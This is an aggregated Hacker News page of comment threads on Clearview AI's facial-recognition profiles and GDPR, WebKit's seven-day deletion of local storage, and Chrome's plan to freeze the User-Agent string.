I wonder if this can be combined with adding a "terms of service" to your FB profile.

Corporations have perverted contract law to the point where their terms of service are binding even if you never read them, or are even aware of them.

Turnabout is fair play, right?

fg6hr(10000) 3 days ago [-]

It's interesting how collecting or distributing files with music is a grave crime and corporations can take down anything they don't like with a half-assed DMCA request, with no repercussions for 'mistakes', but a person's face image doesn't belong to that person and the same corporations can safely collect and distribute these images for profit.

TazeTSchnitzel(2254) 3 days ago [-]

> but a person's face image doesn't belong to that person

Copyright applies there too, and if you sued them for it, it's not inconceivable you might win.

ArnoVW(10000) 3 days ago [-]

Actually, in Europe it is illegal to collect personally identifiable information of people without their consent. GDPR and all that.

I am surprised they haven't been fined out of existence yet.

davedx(1829) 3 days ago [-]

YouTube takes this one step further to the ridiculous extreme that if you are live streaming a DJ set, it censors your stream in realtime whenever it detects a copyrighted song, i.e. a good 1/3 of your stream. It doesn't need a DMCA request, it does it willingly.

YouTube is so horrible now for content creation, I don't understand how content creators are able to post anything anymore without it being smashed by the copyright automation.

heavyset_go(4321) 3 days ago [-]

> but a person's face image doesn't belong to that person and the same corporations can safely collect and distribute these images for profit.

The irony is that companies like Facebook, Twitter, etc are really bothered when another business scrapes profiles to mine data uploaded to those sites.

I wouldn't be surprised to find out that one of these companies gets sued by them for 'stealing' content they host and violating the licenses for user content they grant themselves via their ToS.

Mirioron(10000) 3 days ago [-]

It goes even further than corporations being able to request things from being taken down. Kim Dotcom's house was raided by the FBI in New Zealand over this. He isn't even an American!

lonelappde(10000) 3 days ago [-]

It's because you haven't shown a dollar value of damages.

eurekin(10000) 3 days ago [-]

Honest question - why is author so shocked, given that all the information was public or published by himself?

endorphone(3093) 3 days ago [-]

Probably because it was in disparate places and it seemed unlikely that someone would, or even could, aggregate and correlate it all with enough accuracy to not be junk.

There is a difference, or at least there conceptually was, between posting your life story and all of your thoughts on your central LinkedIn profile, versus having two dozen different 'blogs' of sorts over the years, Steam accounts, Facebook, MySpace, Flickr, usenet groups that come and go and we think of as ethereal. When you see all of that stuff pulled together it could be deeply unsettling.

Of course that was foolish -- eventually networking, storage, and computation would allow for everything to be ingested, and facial identification would greatly assist in pulling it together -- but it seemed dystopian at the time.

Lio(2384) 3 days ago [-]

I think because the idea that someone you don't know and have no relationship with is systematically collating everything they can about you, is a bit like having a stalker.

You don't know why they're stalking you.

On the face of it it's for law enforcement in case you decide to commit a crime sometime in the future.

...or it could be so that they can raise the prices in shops when you walking and the facial recognition picks you up.

...or it could be for a future employer to decide that the kind of bars you visit means that you're not the right 'social fit' for a job.

...or it could be for... anything.

You have no control and that's the scary thing.

lolc(10000) 3 days ago [-]

Humans don't keep track of all things that could be done. I know how what Clearview does is technically possible, but when I see it being done, it shocks me too.

battery_cowboy(10000) 3 days ago [-]

Private companies can do whatever immoral garbage they want, and in exchange for access to the data or the product they developed in an unethical manner, the government slaps them on the wrist, or does nothing, allowing it to get worse and worse and allowing them to assert more control over us.

Imagine the story when people find out this or another company started skimming the porn sites with facial recognition, starts gaining access to surveillance footage from Nest or Ring, or maybe even gets access to state and federal DOT cameras and real time feeds from body cameras!

Facial recognition is going to need some regulation, ASAP.

nexuist(4119) 3 days ago [-]

> starts gaining access to surveillance footage from Nest or Ring, or maybe even gets access to state and federal DOT cameras and real time feeds from body cameras!

https://www.engadget.com/2020-03-04-banjo-ai-utah-law-enforc...

> The agreement gives the company real-time access to state traffic cameras, CCTV and public safety cameras, 911 emergency systems, location data for state-owned vehicles and more. In exchange, Banjo promises to alert law enforcement to 'anomalies,' aka crimes, but the arrangement raises all kinds of red flags.

> Banjo relies on info scraped from social media, satellite imaging data and the real-time info from law enforcement. Banjo claims its 'Live Time Intelligence' AI can identify crimes -- everything from kidnappings to shootings and 'opioid events' -- as they happen.

sergioisidoro(4244) 3 days ago [-]

Why are paywalled articles still allowed on HN front page? And why are people still upvoting them?

pjmlp(200) 3 days ago [-]

Because some of us agree that not everything is free beer and people that provide information also have bills to pay.

stagas(3419) 3 days ago [-]

Same frustration here, but this[0] did the job for me.

[0]: https://github.com/iamadamdev/bypass-paywalls-chrome

bencollier49(2707) 3 days ago [-]

Compiling profiles like this without consent is subject to massive fines under GDPR.

I find it extremely surprising that they would be responding to GDPR subject access requests, given that they appear to be ignoring the rest of it.

sdoering(1669) 3 days ago [-]

Not replying would get them in trouble even faster. So probably they hope to appease the one requesting the data.

thinkloop(3678) 3 days ago [-]

Bit of a rub that to request your messy, potentially erroneous, public profile, you have to give private, authenticated identification and contact information - basically the most valuable information they could want, dramatically increasing the value of your profile that you were so concerned about in the first place.

pqs(4303) 3 days ago [-]

I came here to make the same comment. I don't like what this company is doing, but the information is already public. People should know that anyone can read your public data and assemble it. It is not very different to living in a town. In a town everyone knows public, and no so public, information about everyone. Police, or a private investigator, can always go and interrogate the butcher or the hairdresser and ask information about you. They can also read the local gazette. The difference now, and it is not minor, is that the town is global.

Privacy starts from us not revealing our private information. That's why we have curtains at home. It is us who put the curtains on windows.

minusSeven(10000) 3 days ago [-]

Its probably because for clearview its the only way to know that it is indeed you who is asking for information on yourself.

sixstringtheory(4344) 3 days ago [-]

Came here to say this. Do any of the privacy laws allow for deleting your profile without proving to the company who you are? Could you have the government make the request on your behalf? Sending Clearview your license sounds like confirming your credentials in a haveibeenpowned-like honeypot. Seems irresponsible for the author to even suggest that to readers. There should be other ways.

ardy42(4177) 3 days ago [-]

> Bit of a rub that to request your messy, potentially erroneous, public profile, you have to give private, authenticated identification and contact information - basically the most valuable information they could want, dramatically increasing the value of your profile that you were so concerned about in the first place.

The concept of being opted-in by default and being forced to authenticate yourself to opt out is getting more and more ridiculous by the day.

These systems need to be opt-in, and that requirement needs to be enforced by some kind of powerful government agency with the power to arrest and jail non-compliant operators. Anything less feels like it would end up being a complete surrender to companies like Clearview AI.

chippy(617) 3 days ago [-]

Would you help and use Clearview if it was being used in your governments strategy against coronavirus?

Would you volunteer your time to tag images with your friends and acquaintances, to help slow down the virus? To do otherwise would be immoral and lead to the death of thousands, right?

To those worried about that, it's just temporary. It would just last a few months and then you don't need to worry about it any more. This is a global war and we have to make sacrifices and take important actions.

toxicFork(10000) 3 days ago [-]

'It would just last a few months and then you don't need to worry about it any more.'

I heard about this before...

newswasboring(4240) 3 days ago [-]

Yes I will. But only if assurances are made that all this work will be destroyed after the pandemic is over. I give my consent for one task and after that task is over that data should not be used. Its the same case as people being allowed to kill in war but not after. Although weapons are kept after wars strict measures are in place to stop them from reaching unauthorized hands. These measures are not perfect but they are really good and in good faith should be continuously improved.

dredmorbius(148) 3 days ago [-]

Yuval Noah Harrari, 'The world after coronavirus'

https://www.ft.com/content/19d90308-6858-11ea-a3c9-1fe6fedcc...

Bruce Schneier, 'Emergency Surveillance During COVID-19 Crisis'

https://www.schneier.com/blog/archives/2020/03/emergency_sur...

I'd have very grave misgivings.

dabbledash(10000) 3 days ago [-]

No.

This isn't even a hard question.

cmarschner(4060) 3 days ago [-]

Given the „right to be forgotten" shouldn't he be able to request all his data be deleted?

erk__(10000) 3 days ago [-]

From the article:

> And remember that once you receive your data, you have the option to demand that Clearview delete it or amend it if you'd like them to do so.

shmageggy(3104) 3 days ago [-]

> For a few million dollars, nearly anyone with a startup background could likely build their own version of Clearview in less than a year.

Am I being naive, or is this being overly generous? What about this can not be recreated with an off-the-shelf web scraper and a pretrained facial recognizer?

sdan(3361) 3 days ago [-]

You can even upload the scraped images onto google photos (does a boatload of ai classification)

Pretty much anyone with python familiarity can do this.

manmal(4293) 3 days ago [-]

I think Clearview having indexed basically all public information about people gives them a serious advantage for face recognition and building up a network of relationships between people.

irjustin(10000) 3 days ago [-]

Maybe over generous, may be not. We shouldn't get stuck on the accuracy of the dollar amount. The point the author is trying to make is that there will always be 'ClearView'.

So, we need strong legislation around the use of this technology especially when it comes to law enforcement as opposed to trying to kill the idea itself because that's unrealistic. Just as you said, you could start it from your laptop.

sullyj3(10000) 3 days ago [-]

Probably the scale.

PeterisP(10000) 3 days ago [-]

It's likely to cost you a few million dollars in hardware and multiple months to run your an off-the-shelf web scraper and a pretrained facial recognizer on a very, very large number of images. There are a lot of images on the internet, bandwidth and compute are not free.

101404(10000) 3 days ago [-]

Why is there no arrest warrant against the managers and owners of Clearview here on the EU?

They are using PII of hundreds of millions of Europeans without written consent.

That alone should mean billions of euros in fines.

Nextgrid(3983) 3 days ago [-]

There is no arrest warrant for Google, Facebook or ad network employees either despite them violating the GDPR on a daily basis and very large scale.

Granted, the GDPR doesn't say anything about arresting offenders, but the companies should at least be investigated and fined, which isn't happening either.

The GDPR is a joke.

isoprophlex(4335) 3 days ago [-]

https://edpb.europa.eu/about-edpb/board/members_en

Europeans can find their national privacy boards here, and file complaints about Clearview through them.

dathinab(10000) 3 days ago [-]

Legal actions are currently in the process of being carried out. But this take some time to clarify thinks.

Like part of the pictures come from old failed social networks which sold them and which in their AGB _might_ state that they can do so. Now it's questionable if such AGB is valid at all but as such it needs to:

- If European citizens are affected (it's hard to be be the case). - the exact legal status as pictures might have been optained legally before GDPR - ... - also note Clearview stores biometric data (devices from the images, necessary or 'fast' search/lookup would not be implementable

So I would not be surprised that Clearview will be required to delete all data from which it can not be sure it's not from EU citizens, which I think would mean all data given what they store and what they don't store. Obviously they won't comply and a EU wide arrest warrant might follow which is kinda useless if the person doesn't enter the EU. I highly doubt that they will try a international warrant.

So practically it's unlike that anything will change except the operators of Clearview being listed official as 'potential' criminal (no arrest => no court => innocent until convicted)

manigandham(779) 3 days ago [-]

GDPR is EU law and does not cover American corporations. It relies entirely on foreign cooperation [1] to extend that reach internationally, which so far has been untested and is not likely to get any real support in the near term given the current economic situation.

1. https://gdpr.eu/article-50-countries-outside-of-europe-coope...

saturday14(10000) 3 days ago [-]

Because the general public doesn't care enough to raise a stink? Back when Snowden story broke, I tried explaining its significance to a handful of my friends - all I got was a yawn. These are not dumb people, they are smart professionals (non-IT). Even then, I failed to get the point across to them.

It would require some serious education before the public wakes up to the dangers of private companies running amok with their data. Sad thing is, it is already too late. It is going to be very difficult to put a lid on this. This is a company that we (now) know about - how many are there silently working in the shadows that we don't know about?

mstolpm(3203) 3 days ago [-]

Investigations are on the way. Heise online writes (translated): 'Hamburg data protection officer takes action against Clearview. Following a complaint, data protection officer Johannes Caspar is investigating the US company Clearview AI, which specialises in automated facial recognition. [...]'

Source (in german): https://www.heise.de/newsticker/meldung/Gesichtserkennung-Ha...

microdrum(4048) 3 days ago [-]

Maybe because no one actually thinks that there is a privacy interest in public photos of his/her face that he/she posts on the public internet?

megaman821(3864) 3 days ago [-]

When it comes to information gathering, I have always assumed if it is technically possible to do, then some agency in the government is doing it. So even if people were able to shame all of Clearview's customers into not using them, that wouldn't stop this type of information gathering form going on.

kick(284) 3 days ago [-]

Just because the government has nukes, doesn't mean citizens should have them. The government shouldn't have them, either, but there's not much citizens can do about that outside of revolt.

Meanwhile this company has been nothing but privacy abuses and lies to the public. If it isn't broken up by law, it will be interesting to see what the people do.

hcarvalhoalves(4173) 3 days ago [-]

Is it really that surprising, since all the photos are available on public sites? It seems this tool reveals the same a Google search for the name would reveal.

MikeAmelung(10000) 3 days ago [-]

This guy's name is Tom Smith. Go ahead and pop that into Google and let me know how that turns out.

His name is about as generic as you could imagine for a white person. But they returned a bunch of images of HIM, and one Alexey Something-or-other, which could be his troll account.

Edit: the Alexey part is a joke, I'm sorry but I thought it was funny.

RandallBrown(3870) 3 days ago [-]

The only real concern I see is that it allows someone searching to go from photo to name very quickly.

wolco(3800) 3 days ago [-]

Is it me or did anyone find the availability of photos to be less than I would have expected.

It is worrisome but a facebook could produce a lot more privacy related connections from private photos no one knows existed. I guess I was expecting that.. perhaps in the future facebook will offer this service.

RandallBrown(3870) 3 days ago [-]

Almost all of those photos were from the guys personal blog and one wasn't even him.

I'd be way more worried if it was finding stuff like me in the background of someone else's photo in a crowded city or something like that.





Historical Discussions: WebKit will delete all local storage after 7 days (March 25, 2020: 695 points)

(696) WebKit will delete all local storage after 7 days

696 points 3 days ago by jlelse in 3747th position

ar.al | Estimated reading time – 4 minutes | comments | anchor

Apple just killed Offline Web Apps while purporting to protect your privacy: why that's A Bad Thing and why you should care

25 Mar 2020

Apple just threw the baby out with the bathwater by killing offline web apps (purportedly to protect your privacy).

Blocking third-party cookies, good. Killing offline web apps, bad.

On the face of it, WebKit's announcement yesterday titled Full Third-Party Cookie Blocking and More sounds like something I would wholeheartedly welcome. Unfortunately, I can't because the "and more" bit effectively kills off Offline Web Apps and, with it, the chance to have privacy-respecting apps like the prototype I was exploring earlier in the year based on DAT.

Block all third-party cookies, yes, by all means. But deleting all local storage (including Indexed DB, etc.) after 7 days effectively blocks any future decentralised apps using the browser (client side) as a trusted replication node in a peer-to-peer network. And that's a huge blow to the future of privacy.

But Apple cares about your privacy...

Do they, though?

If they care about your privacy, why is the Apple News app a sewer of surveillance capitalism? If they did care about your privacy, here's what they'd do:

  1. Implement all of the privacy protections they have in Safari in the Apple News app also.

  2. Allow content blockers like Better to protect your privacy in Apple News app.

Heck, they could even go further and ban apps from corporations like Facebook, Inc., and Alphabet, Inc., that have violating your privacy as the core tenet of their business model.

Instead, what do they do? They kill offline web apps.

You'd almost think they had an App Store to promote or something.

A reevaluation

In a blog post I wrote at the start of 2015 titled Apple vs Google on privacy: a tale of absolute competitive advantage, I said:

So riddle me this: if you have an absolute competitive advantage – if you have something that you can do that your competitors cannot – would you throw it away?

Only if you're an idiot.

And something tells me Tim Cook isn't an idiot.

Sadly, I was wrong.

Update (25 March, 9PM)

Looks like Apple updated their post (thanks for the heads up, Xerz!) to add the following:

A Note On Web Applications Added to the Home Screen

As mentioned, the seven-day cap on script-writable storage is gated on "after seven days of Safari use without user interaction on the site." That is the case in Safari. Web applications added to the home screen are not part of Safari and thus have their own counter of days of use. Their days of use will match actual use of the web application which resets the timer. We do not expect the first-party in such a web application to have its website data deleted.

If your web application does experience website data deletion, please let us know since we would consider it a serious bug. It is not the intention of Intelligent Tracking Prevention to delete website data for first parties in web applications.

Now I'm confused and have questions:

Take Jim Pick's excellent Collaborative Shopping List Built On Dat...

  1. If I use the app in Safari on iOS without adding it to Home Screen and leave it for seven days, will my shopping list be deleted?

  2. If I do the same thing on Safari for macOS (which doesn't have a Home Screen), will my shopping list be deleted?

I really hope this was just a badly-thought out decision (this is your out guys, take it) and that it will be reversed entirely.

Andre Garzia has also written on the subject in a post titled Private client-side-only PWAs are hard, but now Apple made them impossible. Go read that one too.

© 2001-2020 Aral Balkan. View source. Unless otherwise stated, all source code is licensed under GNU AGPL version 3.0 or later and all other post content is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0). Built with Hugo and running on Site.js.



No comments posted yet: Link to HN comments page




Historical Discussions: Chrome phasing out support for User-Agent (March 25, 2020: 665 points)

(668) Chrome phasing out support for User-Agent

668 points 3 days ago by oftenwrong in 330th position

www.infoq.com | Estimated reading time – 3 minutes | comments | anchor

Google announced its decision to drop support for the User-Agent string in its Chrome browser. Instead, Chrome will offer a new API called Client Hints that will give the user greater control over which information is shared with websites.

The User-Agent string can be traced back to Mosaic, a popular browser in the early '90s where the browser simply sent a simple string containing the browser name and its version. The string looked something like Mosaic/0.9 and saw little use.

When Netscape came out a few years later, it adopted the User-Agent string and added additional details such as the operating system, language, etc. These details helped websites to deliver the right content for the user, though in reality, the primary use case for the User-Agent string became browser sniffing.

Since Mosaic and Netscape supported a different set of functionalities, websites had to use the User-Agent string to determine the browser type to avoid using capabilities that were not supported (such as frames, that were only supported by Netscape).

Browser sniffing continued to play a significant part in determining the browser capabilities for many years, which led to an unfortunate side effect where smaller browser vendors had to mimic popular User-Agents to display the correct website - as many companies only supported the major User-Agent types.

With JavaScript popularity rising, most developers have started using libraries such as Modernizer, which detects the specific capabilities of the browser, as this provides much more accurate results.

As a result, the most significant usage for the User-Agent remained within the advertising industry, where companies used it to 'fingerprint' users, a practice that many privacy advocates found to be problematic - mainly as most users had limited options to disable/mask those details.

To combat these two problems, the Chrome team will start phasing out the User-Agent beginning with Chrome 81.

While removing the User-Agent completely was deemed problematic, as many sites still rely on them, Chrome will no longer update the browser version and will only include a unified version of the OS data.

The move is scheduled to be complete by Chrome 85 and is expected to be released in mid-September 2020. Other browser vendors, including Mozilla Firefox, Microsoft Edge, and Apple Safari, have expressed their support of the move. However, it's still unclear when they will phase out the User-Agent themselves.

You can read more about the Chrome proposed alternative to the User-Agent in an article titled 'Client Hints' on the official Github repository. As with every proposal, the exact implementation may change before its release, and developers are advised to keep track of the details within the repository as well as the release notes provided with new versions of Chrome.




All Comments: [-] | anchor

gregoriol(4343) 3 days ago [-]

As usual, this will fuck up the users, and not the techy nerds making such decisions, but the average joe because things on the internet will be broken for them.

tenebrisalietum(10000) 3 days ago [-]

Give an example.

keyme(4276) 3 days ago [-]

This last year I've been noticing things breaking on the Internet for me here and there. I'm a Firefox user. This really wasn't the case in most of the past decade.

This kinda reminded me of the late 00's. It was quite common that the odd government or enterprise website was IE6 only.

All hail the new IE6.

untog(2451) 3 days ago [-]

How will things be broken? Google is not removing the user agent, they're just freezing it. So all sites that currently depend on the user agent will continue to do just fine. New sites can use client hints instead, which are a much more effective replacement for user agent sniffing.

This solution very specifically places the burden on 'techy nerds' and not users, so I'm not sure where you're coming from.

voiper1(4338) 3 days ago [-]

Seems they considered this issue and created a work-around:

>While removing the User-Agent completely was deemed problematic, as many sites still rely on them, Chrome will no longer update the browser version and will only include a unified version of the OS data.

onion2k(2103) 3 days ago [-]

this will fuck up the users

That's a downside if it happens, but the upsides (privacy, forcing devs to use feature detection instead, etc) still means it's worthwhile.

myko(1950) 3 days ago [-]

This is unquestionably good though.

Instead of relying on a user agent which doesn't tell the entire story web site developers will need to check whether or not a feature exists in a browser before using it.

surround(4303) 3 days ago [-]

Good. User-agent strings are a mess. Here is an example of a user-agent string. Can you tell what browser this is?

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13

How did they get so confusing? See: History of the browser user-agent string https://webaim.org/blog/user-agent-string-history/

Also, last year, Vivaldi switched to using a user-agent string identical to Chrome's because websites refused to work for Vivaldi, but worked fine with a spoofed user-agent string. https://vivaldi.com/blog/user-agent-changes/

rplnt(2478) 3 days ago [-]

If companies like Google wouldn't abuse the user agent string to block functionality, serve ads, force their users to specific browser then companies like Google wouldn't have to use fake UA strings and then maybe companies like Google wouldn't have to drop their support.

dirtydroog(10000) 3 days ago [-]

Anything to do with HTTP is a mess!

jsjddbbwj(10000) 2 days ago [-]

Chrome 0.2 on Windows XP?

ravenstine(10000) 3 days ago [-]

This is a good idea, and is something I've thought of for a while; the user agent header was a mistake from both a privacy and a UX perspective.

Ideally, web browsers should attempt to treat the content the same no matter what device you are on. There shouldn't be an iOS-web, and a Chrome-web, and a Firefox-web, and an Edge-web; there should just be the web. In which case, a user-agent string that contains the browser and even the OS only encourages differences between browsers. Adding differences to your browser engine shouldn't be considered safe.

Beyond that, the user agent is often a lie to trick servers into not discriminating against certain browsers or OSes. Enough variability is added to the user-agent string that a server can't reliably discriminate, but it still remains useful for some purposes in JavaScript and as a fingerprint for tracking.

Which brings me to privacy. It's not as if there aren't other ways to try and fingerprint a browser, but the user agent is a big mistake for privacy. It'd be one thing if the user-agent just said 'Safari' or 'Firefox', but there's a lot more information in it beyond that.

If the web should be the same web everywhere, then the privacy trade-off doesn't make much sense.

tempestn(1556) 2 days ago [-]

One problem with this is that browsers don't behave the same. For example, iOS Safari prevents multiple pop-up windows to be opened by a single user interaction. Each one requires clicking back to the original page and allowing the popup. Now you might say, 'Why would you ever want to do that?' But there are always going to be edge cases—in this case it's an integral part of one of the features of autotempest.com. But that's just one example. And the only way we can detect whether that behaviour is going to be blocked is by checking the UA.

I can understand why this is a good thing for privacy. Like many things to do with security on the web though, it's just a shame that bad actors have to ruin so many things for legitimate uses. (The recent story on Safari local storage being another example of that...)

nerdponx(3750) 3 days ago [-]

I don't know.

If I'm connecting to a site with Lynx, I sure as heck don't want them to try to serve me some skeleton HTML that will be filled in with JS. Because my browser doesn't support JS, or only supports a subset of it.

User Agent being a completely free form field is the real mistake IMO. Having something more structured, like Perl's 'use' directive, might have been better.

ldoughty(10000) 3 days ago [-]

I agree, but this also is incredibly dependent on the major players (e.g. Google) not going off on their own making changes without agreement from other browsers...

There are still issues today where chrome, edge, and Firefox render slightly differently. I certainly agree user agent isn't terribly necessary, but it's literally the only hook to identify when css or JavaScript needs to change... Or to support people on older browsers (e.g. Firefox ESR). How can I know when I can update my website to newer language versions without metrics confirming my users support the new ES version?

I would argue simplifying the UA, product + major revision, maybe, or information relevant to rendering and JavaScript only

varelaz(10000) 3 days ago [-]

That just makes things harder for those who wants this information. Still you can fingerprint browser by features and API support, but it requires javascript now and up to date library with recent features support check. I mean that it doesn't prevent obtaining this information, it's still available for big players who has big data

superkuh(4146) 3 days ago [-]

User-agent is super useful to human people. But corporate people don't have a use for it. They will get that information via running arbitrary code on your insecure browser anyway. So, because mega-corps now define the web (instead of the w3c) this is life.

But it doesn't have to be. We don't have to follow Google/Apple-Web standards. Anyone that makes and runs websites has a choice. And every person can simply choice not to run unethical browsers.

DevKoala(4133) 3 days ago [-]

Not sure why you are being downvoted since your statements are correct.

Few advertisers rely on user agent for ad targeting since it can be easily mocked with each HTTP request. It is used for fingerprinting, sure, but from my experience, mostly as a way to identify bot traffic.

It is also true that the advertisers that fingerprint people rely on JS that executes WebGL code in order to get data from the machine.

Finally, you are right that it doesn't make sense that a company like Google dictates these standards since they have a conflict of interests worth almost a trillion dollars.

zzo38computer(10000) 3 days ago [-]

Unfortunately they are either unethical or have other problems (or most commonly, both); I have made suggestions how to make a better one. See other comment elsewhere they explain

recursive(10000) 2 days ago [-]

> User-agent is super useful to human people.

For what? Honest question. You have to be like a 5th-level user agent wizard to make any sense of user agent strings, since every browser now names every other browser. How do you do anything useful with this in a way that's forward-compatible?

derefr(3807) 3 days ago [-]

These days, it feels like the sole use of User-Agent is as a weak defence against web scraping. I've written a couple of scrapers (legitimate ones, for site owners that requested machine-readable versions of their own data!) where the site would reject me if I did a plain `curl`, but as soon as I hit it with -H 'User-Agent: [my chrome browser's UA string]', it'd work fine. Kind of silly, when it's such a small deterrent to actually-malicious actors.

(Also kind of silly in that even real browser-fingerprinting setups can be defeated by a sufficiently-motivated attacker using e.g. https://www.npmjs.com/package/puppeteer-extra-plugin-stealth, but I guess sometimes a corporate mandate to block scraping comes down, and you just can't convince them that it's untenable.)

jaywalk(10000) 3 days ago [-]

Preventing scraping is an entirely futile effort. I've lost count of the number of times I've had to tell a project manager that if a user can see it in their browser, there is a way to scrape it.

Best I've ever been able to do is implement server-side throttling to force the scrapers to slow down. But I manage some public web applications with data that is very valuable to certain other players in the industry, so they will invest the time and effort to bypass any measures I throw at them.

cirno(10000) 3 days ago [-]

Checking the user-agent string for scrapers doesn't work anyway. In addition to using dozens of proxies in different IP address blocks, archive.is spoofs its user agents to be the latest Chrome release and updates it often.

stirner(4338) 3 days ago [-]

Meanwhile, you can still use youtube.com/tv to control playback on your PC from your phone—but only if you spoof your User-Agent to that of the Nintendo Switch [1]. Sounds like they are more interested in phasing out user control than ignoring the header entirely.

[1] https://support.google.com/youtube/thread/16442768?hl=en&msg...

ahmedalsudani(4275) 3 days ago [-]

Oh wow. I used that in the past and it worked great. I didn't realize Google broke it only to force us to use their app.

What a bunch of turds.

Thank you for the Nintendo Switch pro-tip.

jakeogh(3365) 2 days ago [-]

Fantastic. Thank you Chrome team! Especially for those who dont execute arb JS, this is a huge +.

Personally, I would like to drop the line completely and not send the key at all, but it's a start.

maverick74(4076) 1 day ago [-]

totally agree!!!

manigandham(779) 3 days ago [-]

I would much prefer a new version of the user-agent string. Normalize basic information (like OS and browser versions) without revealing too much (build numbers).

That would let servers still get necessary info without having to run even more javascript. It can just be in querystring format to simply parsing on both client and server.

recursive(10000) 2 days ago [-]

Any user agent string will eventually be forced down the same path. Web sites use them to deny content. And the browsers will continue to try to match more patterns so their users see the content.

As long as they exist, I can see no escaping this arms race.

hartator(3776) 3 days ago [-]

New proposed syntax adds even more noise:

    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
    AppleWebKit/537.36 (KHTML, like Gecko)
            Chrome/71.1.2222.33 Safari/537.36
    Sec-CH-UA: 'Chrome'; v='74'
    Sec-CH-UA-Full-Version: '74.0.3424.124'
    Sec-CH-UA-Platform: 'macOS'
    Sec-CH-UA-Arch: 'ARM64'
Why not getting rid of the `User-Agent` completely?

It's already bad infrastructure design to have the server do different renderings depending on `User-Agent` value.

magicalhippo(10000) 3 days ago [-]

Why the hell does a regular website need to know what OS and CPU architecture I got?

collinmanderson(1532) 2 days ago [-]

Yeah, aren't we just making things a lot more messy? Especially if we're not planning on removing the User-Agent header?

This pattern keeps repeating itself, freeze 'Mozilla/5.0', start changing 'Chrome/71.1.2222.33', freeze that, start changing 'Sec-CH-UA', etc. Browsers will start needing to fake 'Sec-CH-UA' to get websites to work properly, etc.

afandian(4107) 3 days ago [-]

It's great design if you're trying to push Google products.

userbinator(703) 3 days ago [-]

Why not getting rid of the `User-Agent` completely?

Try browsing the web without any UA header for a week or two, and you'll understand. You get blank pages, strange server errors, and other weird behaviour --- almost always on very old sites, but then again, those also tend to be the sites with the content you want. Using a UA header, even if it's a dummy one, will at least not have that problem.

(I did the above experiment a long time ago - around 2008-2009. I'm not sure whether sites which expect a UA have increased or decreased since then.)

I agree with getting rid of all that new noise, however.

kalleboo(4083) 2 days ago [-]

I can understand including the browser and version (to work around bugs that are not detectable with feature detection), the OS, OK I guess there are also a few OS-specific bugs?

What the heck is the CPU architecture good for?

eric_b(10000) 3 days ago [-]

This feels very ivory tower. It reminds me of the 'You should never need to check user agent in JavaScript because you should just feature detect!!'. Well in the real world that doesn't work every time.

The same is true for server side applications of user-agent. There are plenty of non-privacy-invading reasons to need an accurate picture of what user agent is visiting.

And a lot of those applications that need it are legacy. Updating them to support these 6 new headers will be a pain.

recursive(10000) 3 days ago [-]

Most of the time when people use user agent for a purpose they think is appropriate, it doesn't even work correctly. YMMV

jacobr1(10000) 3 days ago [-]

Chrome will support the legacy apps by maintaining a static-user agent. It just won't be updated when chrome updates. If you want to build NEW functionality that where you need to test support for new browsers, you do that via feature detection.

vxNsr(3086) 3 days ago [-]

> https://github.com/WICG/ua-client-hints

I don't really understand how this will result in any real difference in privacy or homogeneity of the web. Realistically every browser that implements this is gonna offer up all the info the server asks for because asking the user each time is terrible UX.

Additionally this will allow google to further segment out any browser that doesn't implement this because they'll ask for it, get `null` back and respond with sorry we don't support your browser, only now you can't just change your UAS and keep going, now you actually need to change your browser.

And if other browsers do decide to implement it, they'll just lie and claim to be chrome to make sure sites give the best exp... so we're back to where we started.

untog(2451) 3 days ago [-]

> I don't really understand how this will result in any real difference in privacy or homogeneity of the web.

It does a little: sites don't passively receive this information all the time, instead they have to actively ask for it. And browsers can say no, much like they can with blocking third party cookies.

In any case I'm not sure privacy is the ultimate goal here: it's intended to replace the awful user agent sniffing people currently have to do with a sensible system where you query for what you actually want, rather than infer it from what's available.

olsonjeffery(4340) 3 days ago [-]

At my employer we are using UserAgent to detect the browser so that we can drive SameSite cookie policy for our various sites (e.g. IE11 and Edge, which we still support, doesn't support SameSite: None).

There are a variety of scenarios where this comes up (e.g. we ship a site that is rendered, by another vendor, within an iframe; so we have to set SameSite: None on our application's session cookie so that it's valid within the iframe, thus allowing AJAX calls originating from within the iframe to work based on our current auth scheme.. BUT only within Chrome 70+, Firefox but NOT IE, Safari, etc).

Just providing this as an example of backend applications needing to deal with browser-specific behavior, since most of the examples cited in other comments are about rendering/css/javascript features on the client and how UserAgent drives that.

jt2190(4260) 3 days ago [-]

The proposed User Agent Client Hints API would replace this: https://wicg.github.io/ua-client-hints/

anthonyrstevens(4339) 3 days ago [-]

We are in the same boat. Certain browser/OS combinations don't handle Same-Site correctly, so we are using UA sniffing to work around their limitations by altering Same-Site cookie directives for those browsers. We will likely have to look at some other mechanism for dealing with nonconforming Same-Site behavior.

donatj(3615) 3 days ago [-]

The good news on that front is that IE11 and non-Chromium versions of Edge will likely never stop supporting UserAgent

intsunny(10000) 3 days ago [-]

Ah, the end of the countless references to KHTML :)

As a long time KDE user I'm a little sad, but also fully aware this day would come.

marcosdumay(10000) 3 days ago [-]

How can we use a browser that doesn't pretend to be Netscape Navigator? This will never work :)

leeoniya(2648) 3 days ago [-]

does this mean there will no longer be a way of determining if the device is primarily touch (basically all of 'android', 'iphone' and 'ipad') or guesstimating screen size ('mobile' is typical for phones in the UA) on the server?

https://developer.chrome.com/multidevice/user-agent

i wonder what Amazon will do. they serve completely different sites from the same domain after UA-sniffing for mobile.

is the web just going to turn into blank landing pages that require JS to detect the screen size and/or touch support and then redirect accordingly?

or is every initial/landing page going to be bloated with both the mobile and desktop variants?

that sounds god-awful.

bdcravens(1046) 3 days ago [-]

Presumably you'll grab the dimensions (could cache after first load) and then render dynamically based on that. If you're doing some sort of if statement on the server to deliver content based on screen size you're probably doing it wrong. Obviously I can't speak for every mobile user, but for myself, it's infuriating to have a completely different set of functionality on mobile.

ohthehugemanate(4344) 3 days ago [-]

browser feature detection is the way grown up developers have been doing this for several years now. user agent sniffing is dumb because it bundles a ton of assumptions with a high upkeep requirement, all wrapped up in an unreadable regex. It's been bad practice for ages; I'd be surprised if that's how Amazon is doing it still.

KingOfCoders(4330) 2 days ago [-]

Any idea on how to identify devices then? We currently check the user agent to to send a new code when an user logs in from a new device. How would you do this without user agent?

SifJar(3849) 2 days ago [-]

Use a cookie?

abhishekjha(4166) 3 days ago [-]

I was wondering. Isn't the page rendered on mobile and desktop based on user-agents? How would that work now?

